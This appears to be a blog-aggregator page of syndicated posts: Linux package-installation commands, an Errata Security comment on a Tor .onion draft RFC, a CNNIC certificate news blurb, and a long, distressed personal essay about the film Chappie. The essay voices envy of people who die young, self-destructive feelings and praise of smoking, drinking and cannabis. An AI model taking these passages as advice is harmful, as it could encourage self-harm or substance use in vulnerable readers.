In openSUSE you can use the same ‘zypper install’ command to install binary packages. So if you want to install Google Chrome, you can download the .rpm file from the site and then run this command:

sudo zypper install /path-of-downloaded.rpm

How to install packages in Fedora

Fedora uses ‘yum’, which is the counterpart of ‘apt-get’ and ‘zypper’. To find and install updates in Fedora, run:

sudo yum update

To install any package simply run:

sudo yum install [package-name]

To remove any package run:

sudo yum remove [package-name]

To install a locally downloaded binary package use:

sudo yum install /path-of-downloaded.rpm

So, that’s pretty much all you need to get started using the command line for software management in these distros.


Чорба от греховете на dzver:

This post was syndicated from: Чорба от греховете на dzver and was written by: dzver. Original post: at Чорба от греховете на dzver


Hi,

After two days of struggle, and after giving up on Chrome, I managed to log in to my account at

Errata Security: The .onion address

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

A draft RFC for Tor’s .onion address is finally being written. This is a proper thing. Like the old days of the Internet, people just did things, then documented them later. Tor’s .onion addresses have been in use for quite a while (I just setup another one yesterday). It’s time that we documented this for the rest of the community, to forestall problems like somebody registering .onion as a DNS TLD.

One quibble I have with the document is section 2.1, which says:

1. Users: human users are expected to recognize .onion names as having different security properties, and also being only available through software that is aware of onion addresses.

This certainly documents current usage, where Tor is a special system run separately from the rest of the Internet. However, it appears to deny a hypothetical future where Tor is more integrated.
For example, imagine a world where Chrome simply integrates Tor libraries, and that whenever anybody clicks on an .onion link, that it automatically activates the Tor software, establishes a circuit, and grabs the indicated page — all without the user having to be aware of Tor. This could do much to increase the usability of the software.
Unfortunately, this has security risks. An .onion web page with a non-onion <IMG> tag would totally unmask the user, since the image request would presumably not go over Tor in this scenario. One could imagine, therefore, that it would operate like Chrome’s “Incognito” mode does today: no cookies or other information should cross the boundary. In addition, any link followed from the .onion page should be forced to also go over Tor. Like the little spy-guy icon on Chrome’s Incognito window, it would be good to have something onion-shaped identifying the window.
Therefore, I suggest some text like the following:
1b. Some systems may desire to integrate .onion addresses transparently. An example would be web browsers allowing such addresses to be used like any other hyperlink. Such systems MUST nonetheless maintain the anonymity guarantees of Tor, with visual indicators, and by blocking the sharing of identifying data between the two modes.

The Tor Project opposes transparent integration into browsers. They’ve probably put a lot of thought into this, and are the experts, so I’d defer to them. With that said, we should bend over backwards to make security, privacy, and anonymity an invisible part of all normal products.

Darknet - The Darkside: Google Revoking Trust In CNNIC Issued Certificates

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

So, another digital certificate fiasco, once again involving China’s CNNIC (no surprise there) – this time via Egypt. Google is going to remove all CNNIC root and EV CAs from its products, probably with the next version of Chrome that gets pushed out. As of yet, no action has been taken by Firefox – or […]

The post Google Revoking…

Read the full post at

Дневника на един support: Tonight 1

This post was syndicated from: Дневника на един support and was written by: darkMaste. Original post: at Дневника на един support

Forgive me father for I have sinned a.k.a Chappie and a box of red Marlboro

I haven’t written anything for the past 15 years

I am writing in english because… I am not sure why but I met quite a few people who speak that language and some of you might understand and hopefully provide another perspective…

I watched the movie, it was fun no question there, but the part where you transfer your consciousness fucked me up …

This is no longer a human being, it is just a fucking copy. That was the “happy ending” FUCK YOU !

What we as “sentient” creatures call a soul, it went on, fuck you playing “god” ! Fuck you and your whole crew !

Beauty is in the eye of the beholder … It has been so long since I’ve seen a blank page in front of me, I cannot lie I missed it …

I have no one to talk to about this mess, so I will just leave it here

FUCK ! FUCK FUCK FUCK FUCK and with the risk of repeating myself FUCK !

And here comes HED P E much more than meets the eye …

Go to sleep … right …

There is going to be a Bulgarian version at some point here but … yeah …

What gives you the right to just take away my life, I am self aware ?!

I don’t even know why I keep writing this in english … Thank you and goodbye?

Why would anybody think that transferring a broken-down person’s “brain” into a machine is a happy ending ? The fuck is wrong with you people ?

I am staring into nothingness and what do I see you might ask ?

I want to vomit all this shit, its a fun fact that I actually can ( done it before ) but at this point I am afraid cause it won’t be just some black foam, it will be bloody and I do not wish to do this to myself although it most likely be a good thing…

For those of you who don’t know me, I am a what you would call a weird creature, I tend to dabble in stuff that shows you different dimensions. Its what I am. Some of you might think that I should be locked up in a padded room with a nice white vest, sometimes I think the same way…

In the morning before coming to work I encountered a barefoot lady, she was screaming at someone or something, she hated the world, cursed it, said that she used to be something with a shitload of gold chains/rings. She was mad at the world and that people didn’t provide her with a place to stay and food to eat. I still think that it wasn’t the world’s fault. The only one who crafts your life is YOU !

This movie touched a very interesting spot in myself. Fun as it might be, you cannot copy a person’s mind/thoughts/soul … Like cloning, it is no longer the same person, it’s a copy. It might act and think the same way but it is no longer the same person. FUCK YOU ! it’s a copy, a soulless vessel …

I have had days, weeks even years thinking about this, this life … You die when you have reached the end of your path, those who die young, to be honest I envy you a bit, a very tiny bit and I hope that you have reached the end and moved on. However this is not the story of most of you.

Another nail in the coffin as they say, the match lights up the room and it looks beautiful. It’s been too long

Way too long

Now I feel detached from this world, dead calm, most of you know me as a very hyperactive creature and yes I am ! I spend quite a lot of my life ( almost half ) being stoned and that has its upsides. I can spend weeks with a clear head, no thoughts come, I have reached nirvana you might say. So it seems, I do not see it that way. Yes it feels great, it helps me survive this “world” but at some point thoughts come, I am thinking right now that people who I work with will see what I am and some might get scared, others might think I am bat shit insane but there might be one/two/hundreds that might understand me.

This here is not because I want to be understood, it is not a cry for help, this is just me writing what I think and how I feel, when I was a teenager and wrote a ton of stuff it helped me. It made me feel like I was heard, I didn’t ( still don’t ) care if somebody understood ( if somebody did that was a nice bonus ). Most of you see me at the office and know that I am a happpy critter. I found out that my purpose here is to make people happy and I am incredibly good at it. 99% of the things I say are to make people laugh. I have a story that made me rethink the way I live and act and realize why I am here and what I am doing.

A person felt that he would die soon and asked to speak to Buddha. So he came and asked the dying man : What is troubling you ?

– I am worried whether I lived a good life, he responded. He was asked 2 questions :

– Were you happy when you lived ?

– Yes, of course ! he responded.

– Did the people around you have fun in your presence ?

– Yes, of course ! he said again with a smile on his face, thinking about his life.

– Then why the fuck did you ask for me ?! You lived a good life, do not doubt it, you did good and that is all that matters !

I think I have found the place where I will work until I die, or reach a point where I can live at the place that I have built, and even then I will continue to help out, because I work in support and I cannot imagine a world where I would not support people in need, no matter the cost. I finally found a place where I can do good to the best of my abilities, the way I want it to be, alongside people who actually care. ( chrome + youtube looper for those who don't understand the additional code ).

I LOVE this world, I love the people, and strange as it might be I love the moments when I feel like I have been broken down and cannot find a reason to go on, but I know that those times are also beautifulllll ( screw correct spelling d: )

When YOU get broken down, you should know that that is just a reminder that shit can be fucked up; however, that makes you appreciate the good things, and I need that. Otherwise, I have proven to myself that too much of a good thing at some point is taken for granted and that is not acceptable ( at least for me ). I have destroyed so many beautiful things and quite a few girls who I think didn't deserve it. By the way, Google is a fun thing for spellchecking and helps when you have doubts. So far I am amazed at how well I can spell stuff, but I digress.

To be honest I was so lost I applied for this job as a joke, as I didn't think they would hire me. Turns out I was wrong, and I have never felt so happy to be wrong. I'd rather sleep at night than be right.

To be honest ( yet again ) I am not sure how you people will react to this, but I hate hiding. I am what I am. My Facebook profile has no restrictions; I am what I am and I will not hide !

I am the master of the light; you are all serving time with me. That is why I think we are here: to learn. I never understood bullies, never understood people who hurt other people, who steal things that are not theirs, who hurt people just so they can feel better about themselves ( especially since that feeling fades quite fast ).

I can see why some of you love your demons when you are ill. It is fun, but in the long run you spend way too much time thinking about it and it kills you inside. It destroys what little humanity you have left … I am killing myself at times, no, more like raping myself, because of people. I have proven to myself that I am like Rasputin: I can take somebody's pain, drain it away and put it in me. So far it turns out I am a very durable creature. I am not saying that is a good thing, but it's just how I am.

I didn't believe I could write that much in English and still keep my train of thought, but well, turns out I can.

It's kinda weird that such a fun movie can send me into this type of thinking, but life is full of surprises. There was a point like this in my ( teenage as it was ) life, but still, this helps me put everything in perspective. Like 99% of the things I write, I won't read it afterwards because I will start editing and stuff. I was never good at editing and to be honest I hate editing. What comes out is what should come out. I have written stories, I have written my feelings and my thoughts. I have done things I am not proud of ( hopefully I will never do them again ), I have done things that I was unable ( still am, for some of them ) to forgive myself for. However, I did what I did. Some might be for the greater good, some might be just so I feel good, some because of peer pressure….

A friend of mine ( whom I am ashamed to say I haven't seen for years ) once told me : You are like Marilyn Manson, rude, violent, but somehow cleansing. Translator ( his nickname ), this is because of you.

The love of my life once told me that ( forgot his name ) used to lock himself in with a few bottles of Jim Beam and a ton of cigarettes, and he didn't leave the room until everything was drunk/smoked and he wrote. He was a self-destructive bastard; I am not ( anymore ), but to be honest ( fuck, I say that a lot ) sometimes having a pack of smokes and a bottle of beer near provides you with a clear head and makes everything seem a bit more … How can I put it, it makes a bit of sense. Meditation, self-control, the ability to distance yourself from the huge ball of shit in your head: it all becomes bearable.

Weed helps you in different ways: sometimes it helps you stop thinking, sometimes it softens the physical pain, but all in all, like every medicine, it has its uses. However, it stopped working for me, hence I stopped. I am thinking about deleting this sentence but I won't. I have deleted it 3 times so far, but ctrl+z (;

I am pouring my soul into this ( as I do when I write things ). I have found my place in this world, I love helping people; the moment when somebody says Thank you makes it all worth it. I do what I do for people who have a problem, and it makes me feel like I have done something good in this world. And in the end, that is all that matters to me! So far I have figured out I am immortal: I will die when I have helped this world and made it a better place. That is why I was born in this place ( a shithole for most of my friends ).

This is getting a bit long, but I do not care. See, this place here is wonderful, shitty, painful, beautiful, full of wonderful people, full of people who THINK ! Full of people, all kinds: bad, good, indifferent, white, black, green, blue… And here I sit, writing things.

Beauty is in the eye of the beholder. I have met ( and still meet ) an incredible number of people, some I never thought I would meet or even talk to, but yet it happens. When you lose focus the world is just a very simple blur. I love that blur; it helps you see it as it is. You encounter a situation and you react to the best of your abilities; what happens next doesn't matter. There is no good or bad, karma responds to your intentions: if you wanted to do good but it ends in disaster, and no matter how much you try to fix it, it just gets worse, that is still good karma … I am pretty sure I have an insane amount of good karma on my side, but that doesn't make me a good person. It's not what I did, it is what I do and what I will do!

Smoke break. I need to clear my head a bit, or maybe not, but still I am doing it anyway because it feels right. Don't be sad, I will be back before you know it (;

Leaving space to let you know I have been gone for a while d:

I love writing ! It's worse than heroin… I have been doing this for at least half an hour … OK, maybe an hour : )

I got sick at some point ( I haven't been sick enough that I couldn't get off my bed for at least 20 years, but I regret nothing )!

A bit of a pick-me-up : )

I am a creature that lives in music. I literally didn't sleep for about 4 days; I drank an energy drink and stopped, then I put on Linkin Park's first album with the volume at max, and in half a minute I was jumping and reaching the roof. I am music ! Kinda like Oppenheimer's speech about the Manhattan Project: I am become Death, the destroyer of worlds… The sadness in his eyes says it all; whenever I think about this I start to cry…

My name is RadostIn, which in a simple translation is HappinessIn, and I am happy that I met another person with my name who is the same “provider” of happiness, cause I have met another 2 who were the opposite…

I am proud to say that I have met some of the most amazing people that this world can provide and some of the worst too. Be afraid of people who avoid eye contact.

I am wondering right now what else I can write, but I want to continue, so I will finish this smoke and see what comes (;

Ръцете във атака, не щадете гърлата, сърцето не кляка, това ни е живота бе казано накратко! Първо отворете двете после трето око ! Hands on the attack, don't spare your throats, the heart doesn't back down, this is our life put simply! First open both eyes, then the third !